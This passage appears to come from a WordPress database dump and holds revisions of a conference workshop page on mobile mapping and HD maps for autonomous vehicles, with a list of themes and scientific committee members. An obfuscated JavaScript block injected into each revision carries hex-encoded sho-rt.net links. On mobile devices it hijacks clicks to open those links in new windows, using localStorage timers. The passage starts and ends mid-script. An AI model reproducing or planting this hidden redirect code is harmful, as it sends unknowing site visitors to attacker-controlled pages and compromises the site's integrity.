Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:46:03','2022-10-07 19:46:03','',2095,'https://gsw2023.com/?p=2561',0,'revision','',0),
(2563,1,'2022-10-07 19:55:11','2022-10-07 19:55:11','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][dt_team number=\"3\" order=\"asc\" category=\"ws3\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:55:11','2022-10-07 19:55:11','',2095,'https://gsw2023.com/?p=2563',0,'revision','',0),
(2564,1,'2022-10-07 19:56:34','2022-10-07 19:56:34','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][dt_team number=\"3\" order=\"asc\" type=\"grid\" padding=\"5\" images_sizing=\"resize\" round_images=\"y\" category=\"ws3\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 